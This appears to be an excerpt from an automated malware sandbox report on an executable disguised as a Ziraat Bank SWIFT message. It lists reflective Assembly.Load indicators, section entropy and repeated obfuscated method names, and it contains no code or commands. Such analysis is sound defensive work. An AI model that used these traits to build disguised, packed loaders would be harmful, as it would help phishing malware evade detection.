            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.2fa42f4.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.cs.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])
            Source: 12.2.ZnbATfUbUgZW.exe.2b142ac.1.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.cs.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])
            Source: 12.2.ZnbATfUbUgZW.exe.4ec0000.6.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.cs.Net Code: SfcpcmE8Np System.Reflection.Assembly.Load(byte[])
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: section name: .text entropy: 7.107483262139592
            Source: ZnbATfUbUgZW.exe.0.drStatic PE information: section name: .text entropy: 7.107483262139592
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, YCLcRCtv5hOGbAklTW9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, tMr0sf2ktQ0cqReIDA.csHigh entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, n2rATXL28KV38R0smd.csHigh entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, eoHKWGipIdfiIN6Q0L.csHigh entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, VbcBBJZsw7O8CJjepm.csHigh entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, gSLYCAo2ks6U0tcLN5.csHigh entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, Y95DWNwh79jC0AXIjs.csHigh entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, yXQVoVttah0gwrnpmqH.csHigh entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, e6HXljVdEjGQdSClZe.csHigh entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, tyXDLRpfYlQ2iT9RGj.csHigh entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, kVqatYrTNB5m8YTmaE.csHigh entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, SgBVfdGPMnyAiX4E3E.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, E4pxDVsdf93dcIK1T4.csHigh entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, Vpq0WhJdv9bHlWPhF8.csHigh entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, A8HxhQAA0ugxwbQ6Kw.csHigh entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, FplIaptp9erPBeVXkwT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, xVB0TZzo6Y9IDP0lK3.csHigh entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, WKZ2ys0oeOSJB02lY7.csHigh entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, QyKpIStM0exlkftiGxj.csHigh entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, POQYhVu3cvE6cDmFGJ.csHigh entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, NL3VQZfQOXbtAH2bcc.csHigh entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, ANDKXllOPerWYQIQNw.csHigh entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, X2PtWR8nM7XgLEsiB1.csHigh entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, YgONXxyGkWEK9kKFEi.csHigh entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 12.2.ZnbATfUbUgZW.exe.5d30000.7.raw.unpack, nRi2E6kBg4bm6wJjV9.csHigh entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, YCLcRCtv5hOGbAklTW9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, tMr0sf2ktQ0cqReIDA.csHigh entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, n2rATXL28KV38R0smd.csHigh entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, eoHKWGipIdfiIN6Q0L.csHigh entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, VbcBBJZsw7O8CJjepm.csHigh entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, gSLYCAo2ks6U0tcLN5.csHigh entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, Y95DWNwh79jC0AXIjs.csHigh entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, yXQVoVttah0gwrnpmqH.csHigh entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, e6HXljVdEjGQdSClZe.csHigh entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, tyXDLRpfYlQ2iT9RGj.csHigh entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, kVqatYrTNB5m8YTmaE.csHigh entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, SgBVfdGPMnyAiX4E3E.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, E4pxDVsdf93dcIK1T4.csHigh entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, Vpq0WhJdv9bHlWPhF8.csHigh entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, A8HxhQAA0ugxwbQ6Kw.csHigh entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, FplIaptp9erPBeVXkwT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, xVB0TZzo6Y9IDP0lK3.csHigh entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, WKZ2ys0oeOSJB02lY7.csHigh entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, QyKpIStM0exlkftiGxj.csHigh entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, POQYhVu3cvE6cDmFGJ.csHigh entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, NL3VQZfQOXbtAH2bcc.csHigh entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, ANDKXllOPerWYQIQNw.csHigh entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, X2PtWR8nM7XgLEsiB1.csHigh entropy of concatenated method names: 'owiw26I08U', 'hZcw6BFuof', 'I1Awr7Evc1', 'sRpwW0XYsm', 'z1ew5PKgnQ', 'If3wkmi4Ng', 'DXswAlThxK', 'NU7whyVbhD', 'nt6wVLrU0Q', 'vdSwyXLA0q'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, YgONXxyGkWEK9kKFEi.csHigh entropy of concatenated method names: 'bu7OGruICi', 'MYTOCcnIDF', 'v5sOQn3WVP', 'nboODY3ejQ', 'F7GOECk4Ib', 'tBWOZEIF2Z', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 12.2.ZnbATfUbUgZW.exe.3cda270.5.raw.unpack, nRi2E6kBg4bm6wJjV9.csHigh entropy of concatenated method names: 'OifYhIbOnp', 'tZ3YyfuZHT', 'sh7bvnyeTg', 'y5PbtQomU8', 'XQZYmJe1dx', 'LYgYXwAKdp', 'nZvYlBWFXm', 'opHY2Dpfnf', 'ktDY6QTRmt', 'CcrYrsGyym'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, YCLcRCtv5hOGbAklTW9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'UoUOmJ3V52', 'LOrOX1piYl', 'MUyOlLwudR', 'PqHO2Gu1PS', 'v3wO6ZQrCb', 'IqgOrSY33X', 'emmOWN0vKe'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, tMr0sf2ktQ0cqReIDA.csHigh entropy of concatenated method names: 'FQ1gH0gFbh', 'u1JgXLubl8', 'aPBg2Ekd0a', 'nDWg6FLEQu', 'poMg3TytSO', 'W1QgFXCJTp', 'aJDgJP2L8n', 'XUOgP8cR7G', 'cUrgfRXeB7', 'KNXgsjbWLK'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, n2rATXL28KV38R0smd.csHigh entropy of concatenated method names: 'mxvCaaZbhf', 'cJ8C161DYd', 'AR0GFRLX99', 'YVLGJKlEFZ', 'H3oGPPtHFX', 'kXhGfByKEy', 'rq3GsUTyJN', 'AFFGBuvqSV', 'dflGuKwCLX', 'rZ3GH6NZxs'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, eoHKWGipIdfiIN6Q0L.csHigh entropy of concatenated method names: 'Qm9cH5DoZ', 'kEtqOnrMO', 'fVi4B5fTA', 's7k1ha2GQ', 'qhS0acxga', 'K68LCWnBl', 'gN9mL4Rm7pIFXE8dpc', 'q7unU5sQ71OW9qUQvZ', 'ytJbETsbo', 'Q38OCcW9H'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, VbcBBJZsw7O8CJjepm.csHigh entropy of concatenated method names: 'vUeMTsG7Yg', 'yBsMSQ9qcu', 'bEnMwxbp89', 'fZ7MGkbFIV', 'x3dMCMW7Qh', 'TDAMQiEV6I', 'yByMDGtIK5', 'RXBMZLLlFV', 'Is9MNBucli', 'RWGMjtx0Q6'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, gSLYCAo2ks6U0tcLN5.csHigh entropy of concatenated method names: 'vJXQTpmxhP', 'QnHQwPAVPB', 'hacQCYnS4C', 'Ho0QDIS61H', 'cLNQZHAZMD', 'Jl1C5jbqAA', 'WWwCkuuU41', 'e7ACASsAtJ', 'HGdChbG8wD', 'D5ACVhboJc'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, Y95DWNwh79jC0AXIjs.csHigh entropy of concatenated method names: 'Dispose', 'MgxtVwbQ6K', 'b9vi35gSNy', 'tq00rvlqli', 'gk5tyQQJS6', 'WrmtzZKtJt', 'ProcessDialogKey', 'hHTiv6HXlj', 'xEjitGQdSC', 'QZeiiygONX'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, yXQVoVttah0gwrnpmqH.csHigh entropy of concatenated method names: 'vFQOyBiCh9', 'sToOzL9rP2', 'AxPnviZtKE', 'leWntKl2Ei', 'gC4nimkrjK', 'cpmnMrL2f5', 'T9pnpkZsS4', 'KoYnTJiKNK', 'SpsnSFdlwl', 'D6qnwUG6GS'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, e6HXljVdEjGQdSClZe.csHigh entropy of concatenated method names: 'UDgEoPs2XW', 'OU2E3AYO1D', 'BbREF2U7bp', 'JQCEJ4iy1q', 'WFyEPKeX3t', 'O2TEfYysit', 'j83EsbKgwM', 'toMEBglOtK', 'CTAEuIefHK', 'kZcEH5fiG4'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, tyXDLRpfYlQ2iT9RGj.csHigh entropy of concatenated method names: 'ShVtD2PtWR', 'tM7tZXgLEs', 'KoetjOSJB0', 'RlYt9792rA', 'p0stgmdwSL', 'pCAtR2ks6U', 'wR8smUlQqrluj4uv2e', 'gsLWqwgOh7w7V4tHpP', 'kh8ttM2Win', 'uQutMQIlAt'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, kVqatYrTNB5m8YTmaE.csHigh entropy of concatenated method names: 'ToString', 'IQ5Rm29Tkv', 'xwaR3ZxN7D', 'UJpRF9kgS5', 'FeORJ60lND', 'eJMRPgVRWy', 'hh1Rfn8d5h', 'u1wRsewFjN', 'uMlRB1EmXj', 'JX3Rul5r4q'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, SgBVfdGPMnyAiX4E3E.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'teuiVa8aI2', 'mLBiy6AFJE', 'O7qizDnmhH', 'jPbMvR4kXy', 'C2YMtJqWHU', 'yKBMiw8d1o', 'WnkMM79Yhk', 'T9WoxEj10i2uCMW3IgU'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, E4pxDVsdf93dcIK1T4.csHigh entropy of concatenated method names: 'gEtDSdmnMu', 'FaiDGff4Ph', 'nX7DQc15BA', 'LrnQyodmSW', 'UOJQzqAB5I', 'wrtDvDs0Au', 'bXeDtbU68i', 'gLRDiiOyOh', 'kOLDMBb5Pc', 'j5wDppHa4x'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, Vpq0WhJdv9bHlWPhF8.csHigh entropy of concatenated method names: 'x1iQK7C2XJ', 'ugcQdiq7A1', 'SCnQcQQoW5', 'P0PQqLvSFM', 'hg2Q4krnjt', 'oMyQ1f3e7a', 'Fo0Q0c3X6a', 'FJIQLDqaBK', 'SwYkSt799u7nDhqsETA', 'lPymrO7FNxRyy7BsraX'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, A8HxhQAA0ugxwbQ6Kw.csHigh entropy of concatenated method names: 'LyxEgdCkMP', 'ewFEYeyrdX', 'r2QEExiEZE', 'HI4EntmvQP', 'dJMExXIEtq', 'pm9EKSDxde', 'Dispose', 'RBXbS5HZw7', 'i4FbwKsKaV', 'mZPbGgYl1G'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, FplIaptp9erPBeVXkwT.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YxOeEwNDer', 'p9veOfWAT4', 'r8senpm1KA', 'V5See34x22', 'aHkexgegaG', 'YC4eI5x75q', 'njeeKiD6uP'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, xVB0TZzo6Y9IDP0lK3.csHigh entropy of concatenated method names: 'JKhO4Syf1Q', 'qZHO8nHvLw', 'ExdO0CUiVW', 'qSgOoexEhM', 'cd3O3S92A1', 'owPOJNI0qZ', 'FdYOPhrnnB', 'idROKNyb2v', 'lVSOdWCV3s', 'kybO7tLnij'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, WKZ2ys0oeOSJB02lY7.csHigh entropy of concatenated method names: 'CQ8Gq2kUKJ', 'MPHG4Sgv4d', 'kfMG8hUhm0', 'plmG0x0mc8', 'PKgGgciojX', 'QZoGR3V391', 'FIkGY8DB8Q', 'vuMGbfaAj1', 'Wk2GEg6TWi', 'JXtGOZLCKr'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, QyKpIStM0exlkftiGxj.csHigh entropy of concatenated method names: 'f90nyHd6iA', 'HsJnzBLTQJ', 'MCjevY9Ey6', 'orKVTp1t7oGHYWhtsVt', 'l7mwUr17ImvckZvh3EY', 'sEBKGL1GyOYX4rjDMcA', 'eWnK1f11CWQbeV07C8P'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, POQYhVu3cvE6cDmFGJ.csHigh entropy of concatenated method names: 'bKNDdv0DQm', 'QIjD7SPkHE', 'xXnDcbShch', 'b7uDqe2R43', 'V5hDamXu36', 'VMgD4E6xZk', 'Sf2D1dLkkx', 'CNgD8D4pCI', 'W6dD0y36Cl', 'eJeDLyNPZN'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, NL3VQZfQOXbtAH2bcc.csHigh entropy of concatenated method names: 'D2oQrXGFSO', 'QYVQWXjVTO', 'jxKQ5Qwv7h', 'ToString', 'SxpQkqdc6t', 'mo8QAeC1vO', 'wZIPwL7KtcB7JtYxoAk', 'DWH2E07h8TugABKyEfc', 't2RudB7aToU27c9GJep'
            Source: 12.2.ZnbATfUbUgZW.exe.3beba80.4.raw.unpack, ANDKXllOPerWYQIQNw.csHigh entropy of concatenated method names: 'VqIU8yiu3Q', 'N87U0wGnqe', 'qEtUoDQtDA', 'rHnU31gKVk', 'HKXUJyujPC', 'QNVUP6ALe4', 'ndlUshZQf7', 'VXEUBD9dyb', 'DbnUHNqk56', 'nn2UmLkxED'
